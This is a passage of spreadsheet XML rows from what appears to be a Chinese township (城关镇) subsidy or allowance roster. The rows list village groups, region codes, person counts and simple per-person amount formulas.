    <row r="156" ht="23" customHeight="1" spans="1:11">
      <c r="A156" s="13" t="s">
        <v>622</v>
      </c>
      <c r="B156" s="14" t="str">
        <f>B155</f>
        <v>城关镇</v>
      </c>
      <c r="C156" s="14" t="str">
        <f>C155</f>
        <v>东北六组</v>
      </c>
      <c r="D156" s="13" t="s">
        <v>623</v>
      </c>
      <c r="E156" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F156" s="14" t="str">
        <f>F155</f>
        <v>4113210103</v>
      </c>
      <c r="G156" s="14"/>
      <c r="H156" s="14"/>
      <c r="I156" s="14"/>
      <c r="J156" s="14"/>
      <c r="K156" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="157" ht="23" customHeight="1" spans="1:11">
      <c r="A157" s="13" t="s">
        <v>624</v>
      </c>
      <c r="B157" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C157" s="14" t="s">
        <v>271</v>
      </c>
      <c r="D157" s="14" t="s">
        <v>625</v>
      </c>
      <c r="E157" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F157" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G157" s="14">
        <v>1</v>
      </c>
      <c r="H157" s="14">
        <v>340</v>
      </c>
      <c r="I157" s="14">
        <f t="shared" ref="I157:I162" si="5">H157*G157</f>
        <v>340</v>
      </c>
      <c r="J157" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K157" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="158" ht="23" customHeight="1" spans="1:11">
      <c r="A158" s="13" t="s">
        <v>626</v>
      </c>
      <c r="B158" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C158" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D158" s="14" t="s">
        <v>627</v>
      </c>
      <c r="E158" s="14" t="s">
        <v>411</v>
      </c>
      <c r="F158" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G158" s="14">
        <v>1</v>
      </c>
      <c r="H158" s="14">
        <v>340</v>
      </c>
      <c r="I158" s="14">
        <f t="shared" si="5"/>
        <v>340</v>
      </c>
      <c r="J158" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K158" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="159" ht="23" customHeight="1" spans="1:11">
      <c r="A159" s="13" t="s">
        <v>628</v>
      </c>
      <c r="B159" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C159" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D159" s="14" t="s">
        <v>629</v>
      </c>
      <c r="E159" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F159" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G159" s="14">
        <v>1</v>
      </c>
      <c r="H159" s="14">
        <v>340</v>
      </c>
      <c r="I159" s="14">
        <f t="shared" si="5"/>
        <v>340</v>
      </c>
      <c r="J159" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K159" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="160" ht="23" customHeight="1" spans="1:11">
      <c r="A160" s="13" t="s">
        <v>630</v>
      </c>
      <c r="B160" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C160" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D160" s="14" t="s">
        <v>631</v>
      </c>
      <c r="E160" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F160" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G160" s="14">
        <v>1</v>
      </c>
      <c r="H160" s="14">
        <v>340</v>
      </c>
      <c r="I160" s="14">
        <f t="shared" si="5"/>
        <v>340</v>
      </c>
      <c r="J160" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K160" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="161" ht="23" customHeight="1" spans="1:11">
      <c r="A161" s="13" t="s">
        <v>632</v>
      </c>
      <c r="B161" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C161" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D161" s="14" t="s">
        <v>633</v>
      </c>
      <c r="E161" s="14" t="s">
        <v>634</v>
      </c>
      <c r="F161" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G161" s="14">
        <v>1</v>
      </c>
      <c r="H161" s="14">
        <v>340</v>
      </c>
      <c r="I161" s="14">
        <f t="shared" si="5"/>
        <v>340</v>
      </c>
      <c r="J161" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K161" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="162" ht="23" customHeight="1" spans="1:11">
      <c r="A162" s="13" t="s">
        <v>635</v>
      </c>
      <c r="B162" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C162" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D162" s="14" t="s">
        <v>636</v>
      </c>
      <c r="E162" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F162" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G162" s="14">
        <v>2</v>
      </c>
      <c r="H162" s="14">
        <v>300</v>
      </c>
      <c r="I162" s="14">
        <f t="shared" si="5"/>
        <v>600</v>
      </c>
      <c r="J162" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K162" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="163" ht="23" customHeight="1" spans="1:11">
      <c r="A163" s="13" t="s">
        <v>638</v>
      </c>
      <c r="B163" s="14" t="str">
        <f>B162</f>
        <v>城关镇</v>
      </c>
      <c r="C163" s="14" t="str">
        <f>C162</f>
        <v>东北一组</v>
      </c>
      <c r="D163" s="13" t="s">
        <v>639</v>
      </c>
      <c r="E163" s="13" t="s">
        <v>584</v>
      </c>
      <c r="F163" s="14" t="str">
        <f>F162</f>
        <v>4113210103</v>
      </c>
      <c r="G163" s="14"/>
      <c r="H163" s="14"/>
      <c r="I163" s="14"/>
      <c r="J163" s="14"/>
      <c r="K163" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="164" ht="23" customHeight="1" spans="1:11">
      <c r="A164" s="13" t="s">
        <v>640</v>
      </c>
      <c r="B164" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C164" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D164" s="14" t="s">
        <v>641</v>
      </c>
      <c r="E164" s="14" t="s">
        <v>642</v>
      </c>
      <c r="F164" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G164" s="14">
        <v>1</v>
      </c>
      <c r="H164" s="14">
        <v>340</v>
      </c>
      <c r="I164" s="14">
        <f>H164*G164</f>
        <v>340</v>
      </c>
      <c r="J164" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K164" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="165" ht="23" customHeight="1" spans="1:11">
      <c r="A165" s="13" t="s">
        <v>643</v>
      </c>
      <c r="B165" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C165" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D165" s="14" t="s">
        <v>644</v>
      </c>
      <c r="E165" s="14" t="s">
        <v>645</v>
      </c>
      <c r="F165" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G165" s="14">
        <v>1</v>
      </c>
      <c r="H165" s="14">
        <v>340</v>
      </c>
      <c r="I165" s="14">
        <f>H165*G165</f>
        <v>340</v>
      </c>
      <c r="J165" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K165" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="166" ht="23" customHeight="1" spans="1:11">
      <c r="A166" s="13" t="s">
        <v>646</v>
      </c>
      <c r="B166" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C166" s="14" t="s">
        <v>647</v>
      </c>
      <c r="D166" s="14" t="s">
        <v>648</v>
      </c>
      <c r="E166" s="14" t="s">
        <v>649</v>
      </c>
      <c r="F166" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G166" s="14">
        <v>1</v>
      </c>
      <c r="H166" s="14">
        <v>340</v>
      </c>
      <c r="I166" s="14">
        <f>H166*G166</f>
        <v>340</v>
      </c>
      <c r="J166" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K166" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="167" ht="23" customHeight="1" spans="1:11">
      <c r="A167" s="13" t="s">
        <v>650</v>
      </c>
      <c r="B167" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C167" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D167" s="14" t="s">
        <v>651</v>
      </c>
      <c r="E167" s="14" t="s">
        <v>551</v>
      </c>
      <c r="F167" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G167" s="14">
        <v>1</v>
      </c>
      <c r="H167" s="14">
        <v>340</v>
      </c>
      <c r="I167" s="14">
        <f>H167*G167</f>
        <v>340</v>
      </c>
      <c r="J167" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K167" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="168" ht="23" customHeight="1" spans="1:11">
      <c r="A168" s="13" t="s">
        <v>652</v>
      </c>
      <c r="B168" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C168" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D168" s="14" t="s">
        <v>653</v>
      </c>
      <c r="E168" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F168" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G168" s="14">
        <v>2</v>
      </c>
      <c r="H168" s="14">
        <v>300</v>
      </c>
      <c r="I168" s="14">
        <f>H168*G168</f>
        <v>600</v>
      </c>
      <c r="J168" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K168" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="169" ht="23" customHeight="1" spans="1:11">
      <c r="A169" s="13" t="s">
        <v>654</v>
      </c>
      <c r="B169" s="14" t="str">
        <f>B168</f>
        <v>城关镇</v>
      </c>
      <c r="C169" s="14" t="str">
        <f>C168</f>
        <v>西北村</v>
      </c>
      <c r="D169" s="18" t="s">
        <v>655</v>
      </c>
      <c r="E169" s="19" t="s">
        <v>656</v>
      </c>
      <c r="F169" s="14" t="str">
        <f>F168</f>
        <v>4113210106</v>
      </c>
      <c r="G169" s="14"/>
      <c r="H169" s="14"/>
      <c r="I169" s="14"/>
      <c r="J169" s="14"/>
      <c r="K169" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="170" ht="23" customHeight="1" spans="1:11">
      <c r="A170" s="13" t="s">
        <v>657</v>
      </c>
      <c r="B170" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C170" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D170" s="14" t="s">
        <v>658</v>
      </c>
      <c r="E170" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F170" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G170" s="14">
        <v>1</v>
      </c>
      <c r="H170" s="14">
        <v>340</v>
      </c>
      <c r="I170" s="14">
        <f t="shared" ref="I170:I181" si="6">H170*G170</f>
        <v>340</v>
      </c>
      <c r="J170" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K170" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="171" ht="23" customHeight="1" spans="1:11">
      <c r="A171" s="13" t="s">
        <v>659</v>
      </c>
      <c r="B171" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C171" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D171" s="14" t="s">
        <v>660</v>
      </c>
      <c r="E171" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F171" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G171" s="14">
        <v>1</v>
      </c>
      <c r="H171" s="14">
        <v>340</v>
      </c>
      <c r="I171" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J171" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K171" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="172" ht="23" customHeight="1" spans="1:11">
      <c r="A172" s="13" t="s">
        <v>661</v>
      </c>
      <c r="B172" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C172" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D172" s="14" t="s">
        <v>662</v>
      </c>
      <c r="E172" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F172" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G172" s="14">
        <v>1</v>
      </c>
      <c r="H172" s="14">
        <v>340</v>
      </c>
      <c r="I172" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J172" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K172" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="173" ht="23" customHeight="1" spans="1:11">
      <c r="A173" s="13" t="s">
        <v>663</v>
      </c>
      <c r="B173" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C173" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D173" s="14" t="s">
        <v>664</v>
      </c>
      <c r="E173" s="14" t="s">
        <v>665</v>
      </c>
      <c r="F173" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G173" s="14">
        <v>1</v>
      </c>
      <c r="H173" s="14">
        <v>340</v>
      </c>
      <c r="I173" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J173" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K173" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="174" ht="23" customHeight="1" spans="1:11">
      <c r="A174" s="13" t="s">
        <v>666</v>
      </c>
      <c r="B174" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C174" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D174" s="14" t="s">
        <v>667</v>
      </c>
      <c r="E174" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F174" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G174" s="14">
        <v>1</v>
      </c>
      <c r="H174" s="14">
        <v>340</v>
      </c>
      <c r="I174" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J174" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K174" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="175" ht="23" customHeight="1" spans="1:11">
      <c r="A175" s="13" t="s">
        <v>668</v>
      </c>
      <c r="B175" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C175" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D175" s="14" t="s">
        <v>669</v>
      </c>
      <c r="E175" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F175" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G175" s="14">
        <v>1</v>
      </c>
      <c r="H175" s="14">
        <v>340</v>
      </c>
      <c r="I175" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J175" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K175" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="176" ht="23" customHeight="1" spans="1:11">
      <c r="A176" s="13" t="s">
        <v>670</v>
      </c>
      <c r="B176" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C176" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D176" s="14" t="s">
        <v>671</v>
      </c>
      <c r="E176" s="14" t="s">
        <v>672</v>
      </c>
      <c r="F176" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G176" s="14">
        <v>1</v>
      </c>
      <c r="H176" s="14">
        <v>340</v>
      </c>
      <c r="I176" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J176" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K176" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="177" ht="23" customHeight="1" spans="1:11">
      <c r="A177" s="13" t="s">
        <v>673</v>
      </c>
      <c r="B177" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C177" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D177" s="14" t="s">
        <v>674</v>
      </c>
      <c r="E177" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F177" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G177" s="14">
        <v>1</v>
      </c>
      <c r="H177" s="14">
        <v>340</v>
      </c>
      <c r="I177" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J177" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K177" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="178" ht="23" customHeight="1" spans="1:11">
      <c r="A178" s="13" t="s">
        <v>675</v>
      </c>
      <c r="B178" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C178" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D178" s="14" t="s">
        <v>676</v>
      </c>
      <c r="E178" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F178" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G178" s="14">
        <v>1</v>
      </c>
      <c r="H178" s="14">
        <v>340</v>
      </c>
      <c r="I178" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J178" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K178" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="179" ht="23" customHeight="1" spans="1:11">
      <c r="A179" s="13" t="s">
        <v>677</v>
      </c>
      <c r="B179" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C179" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D179" s="14" t="s">
        <v>678</v>
      </c>
      <c r="E179" s="14" t="s">
        <v>679</v>
      </c>
      <c r="F179" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G179" s="14">
        <v>1</v>
      </c>
      <c r="H179" s="14">
        <v>340</v>
      </c>
      <c r="I179" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J179" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K179" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="180" ht="23" customHeight="1" spans="1:11">
      <c r="A180" s="13" t="s">
        <v>680</v>
      </c>
      <c r="B180" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C180" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D180" s="14" t="s">
        <v>681</v>
      </c>
      <c r="E180" s="14" t="s">
        <v>682</v>
      </c>
      <c r="F180" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G180" s="14">
        <v>1</v>
      </c>
      <c r="H180" s="14">
        <v>340</v>
      </c>
      <c r="I180" s="14">
        <f t="shared" si="6"/>
        <v>340</v>
      </c>
      <c r="J180" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K180" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="181" ht="23" customHeight="1" spans="1:11">
      <c r="A181" s="13" t="s">
        <v>683</v>
      </c>
      <c r="B181" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C181" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D181" s="14" t="s">
        <v>684</v>
      </c>
      <c r="E181" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F181" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G181" s="14">
        <v>2</v>
      </c>
      <c r="H181" s="14">
        <v>300</v>
      </c>
      <c r="I181" s="14">
        <f t="shared" si="6"/>
        <v>600</v>
      </c>
      <c r="J181" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K181" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="182" ht="23" customHeight="1" spans="1:11">
      <c r="A182" s="13" t="s">
        <v>685</v>
      </c>
      <c r="B182" s="14" t="str">
        <f>B181</f>
        <v>城关镇</v>
      </c>
      <c r="C182" s="14" t="str">
        <f>C181</f>
        <v>北外村</v>
      </c>
      <c r="D182" s="13" t="s">
        <v>686</v>
      </c>
      <c r="E182" s="13" t="s">
        <v>419</v>
      </c>
      <c r="F182" s="14" t="str">
        <f>F181</f>
        <v>4113210102</v>
      </c>
      <c r="G182" s="14"/>
      <c r="H182" s="14"/>
      <c r="I182" s="14"/>
      <c r="J182" s="14"/>
      <c r="K182" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="183" ht="23" customHeight="1" spans="1:11">
      <c r="A183" s="13" t="s">
        <v>687</v>
      </c>
      <c r="B183" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C183" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D183" s="14" t="s">
        <v>688</v>
      </c>
      <c r="E183" s="14" t="s">
        <v>689</v>
      </c>
      <c r="F183" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G183" s="14">
        <v>1</v>
      </c>
      <c r="H183" s="14">
        <v>340</v>
      </c>
      <c r="I183" s="14">
        <f>H183*G183</f>
        <v>340</v>
      </c>
      <c r="J183" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K183" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="184" ht="23" customHeight="1" spans="1:11">
      <c r="A184" s="13" t="s">
        <v>690</v>
      </c>
      <c r="B184" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C184" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D184" s="14" t="s">
        <v>691</v>
      </c>
      <c r="E184" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F184" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G184" s="14">
        <v>2</v>
      </c>
      <c r="H184" s="14">
        <v>300</v>
      </c>
      <c r="I184" s="14">
        <f>H184*G184</f>
        <v>600</v>
      </c>
      <c r="J184" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K184" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="185" ht="23" customHeight="1" spans="1:11">
      <c r="A185" s="13" t="s">
        <v>692</v>
      </c>
      <c r="B185" s="14" t="str">
        <f>B184</f>
        <v>城关镇</v>
      </c>
      <c r="C185" s="14" t="str">
        <f>C184</f>
        <v>北外村</v>
      </c>
      <c r="D185" s="18" t="s">
        <v>693</v>
      </c>
      <c r="E185" s="18" t="s">
        <v>502</v>
      </c>
      <c r="F185" s="14" t="str">
        <f>F184</f>
        <v>4113210102</v>
      </c>
      <c r="G185" s="14"/>
      <c r="H185" s="14"/>
      <c r="I185" s="14"/>
      <c r="J185" s="14"/>
      <c r="K185" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="186" ht="23" customHeight="1" spans="1:11">
      <c r="A186" s="13" t="s">
        <v>694</v>
      </c>
      <c r="B186" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C186" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D186" s="14" t="s">
        <v>695</v>
      </c>
      <c r="E186" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F186" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G186" s="14">
        <v>2</v>
      </c>
      <c r="H186" s="14">
        <v>300</v>
      </c>
      <c r="I186" s="14">
        <f>H186*G186</f>
        <v>600</v>
      </c>
      <c r="J186" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K186" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="187" ht="23" customHeight="1" spans="1:11">
      <c r="A187" s="13" t="s">
        <v>696</v>
      </c>
      <c r="B187" s="14" t="str">
        <f>B186</f>
        <v>城关镇</v>
      </c>
      <c r="C187" s="14" t="str">
        <f>C186</f>
        <v>东北六组</v>
      </c>
      <c r="D187" s="13" t="s">
        <v>697</v>
      </c>
      <c r="E187" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F187" s="14" t="str">
        <f>F186</f>
        <v>4113210103</v>
      </c>
      <c r="G187" s="14"/>
      <c r="H187" s="14"/>
      <c r="I187" s="14"/>
      <c r="J187" s="14"/>
      <c r="K187" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="188" ht="23" customHeight="1" spans="1:11">
      <c r="A188" s="13" t="s">
        <v>698</v>
      </c>
      <c r="B188" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C188" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D188" s="14" t="s">
        <v>699</v>
      </c>
      <c r="E188" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F188" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G188" s="14">
        <v>1</v>
      </c>
      <c r="H188" s="14">
        <v>340</v>
      </c>
      <c r="I188" s="14">
        <f>H188*G188</f>
        <v>340</v>
      </c>
      <c r="J188" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K188" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="189" ht="23" customHeight="1" spans="1:11">
      <c r="A189" s="13" t="s">
        <v>700</v>
      </c>
      <c r="B189" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C189" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D189" s="14" t="s">
        <v>701</v>
      </c>
      <c r="E189" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F189" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G189" s="14">
        <v>1</v>
      </c>
      <c r="H189" s="14">
        <v>340</v>
      </c>
      <c r="I189" s="14">
        <f>H189*G189</f>
        <v>340</v>
      </c>
      <c r="J189" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K189" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="190" ht="23" customHeight="1" spans="1:11">
      <c r="A190" s="13" t="s">
        <v>702</v>
      </c>
      <c r="B190" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C190" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D190" s="14" t="s">
        <v>703</v>
      </c>
      <c r="E190" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F190" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G190" s="14">
        <v>1</v>
      </c>
      <c r="H190" s="14">
        <v>340</v>
      </c>
      <c r="I190" s="14">
        <f>H190*G190</f>
        <v>340</v>
      </c>
      <c r="J190" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K190" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="191" ht="23" customHeight="1" spans="1:11">
      <c r="A191" s="13" t="s">
        <v>704</v>
      </c>
      <c r="B191" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C191" s="14" t="s">
        <v>271</v>
      </c>
      <c r="D191" s="14" t="s">
        <v>705</v>
      </c>
      <c r="E191" s="14" t="s">
        <v>706</v>
      </c>
      <c r="F191" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G191" s="14">
        <v>1</v>
      </c>
      <c r="H191" s="14">
        <v>340</v>
      </c>
      <c r="I191" s="14">
        <f>H191*G191</f>
        <v>340</v>
      </c>
      <c r="J191" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K191" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="192" ht="23" customHeight="1" spans="1:11">
      <c r="A192" s="13" t="s">
        <v>707</v>
      </c>
      <c r="B192" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C192" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D192" s="14" t="s">
        <v>708</v>
      </c>
      <c r="E192" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F192" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G192" s="14">
        <v>2</v>
      </c>
      <c r="H192" s="14">
        <v>300</v>
      </c>
      <c r="I192" s="14">
        <f>H192*G192</f>
        <v>600</v>
      </c>
      <c r="J192" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K192" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="193" ht="23" customHeight="1" spans="1:11">
      <c r="A193" s="13" t="s">
        <v>710</v>
      </c>
      <c r="B193" s="14" t="str">
        <f>B192</f>
        <v>城关镇</v>
      </c>
      <c r="C193" s="14" t="str">
        <f>C192</f>
        <v>东北六组</v>
      </c>
      <c r="D193" s="13" t="s">
        <v>711</v>
      </c>
      <c r="E193" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F193" s="14" t="str">
        <f>F192</f>
        <v>4113210103</v>
      </c>
      <c r="G193" s="14"/>
      <c r="H193" s="14"/>
      <c r="I193" s="14"/>
      <c r="J193" s="14"/>
      <c r="K193" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="194" ht="23" customHeight="1" spans="1:11">
      <c r="A194" s="13" t="s">
        <v>712</v>
      </c>
      <c r="B194" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C194" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D194" s="14" t="s">
        <v>713</v>
      </c>
      <c r="E194" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F194" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G194" s="14">
        <v>1</v>
      </c>
      <c r="H194" s="14">
        <v>340</v>
      </c>
      <c r="I194" s="14">
        <f>H194*G194</f>
        <v>340</v>
      </c>
      <c r="J194" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K194" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="195" ht="23" customHeight="1" spans="1:11">
      <c r="A195" s="13" t="s">
        <v>714</v>
      </c>
      <c r="B195" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C195" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D195" s="14" t="s">
        <v>715</v>
      </c>
      <c r="E195" s="14" t="s">
        <v>716</v>
      </c>
      <c r="F195" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G195" s="14">
        <v>1</v>
      </c>
      <c r="H195" s="14">
        <v>340</v>
      </c>
      <c r="I195" s="14">
        <f>H195*G195</f>
        <v>340</v>
      </c>
      <c r="J195" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K195" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="196" ht="23" customHeight="1" spans="1:11">
      <c r="A196" s="13" t="s">
        <v>717</v>
      </c>
      <c r="B196" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C196" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D196" s="14" t="s">
        <v>718</v>
      </c>
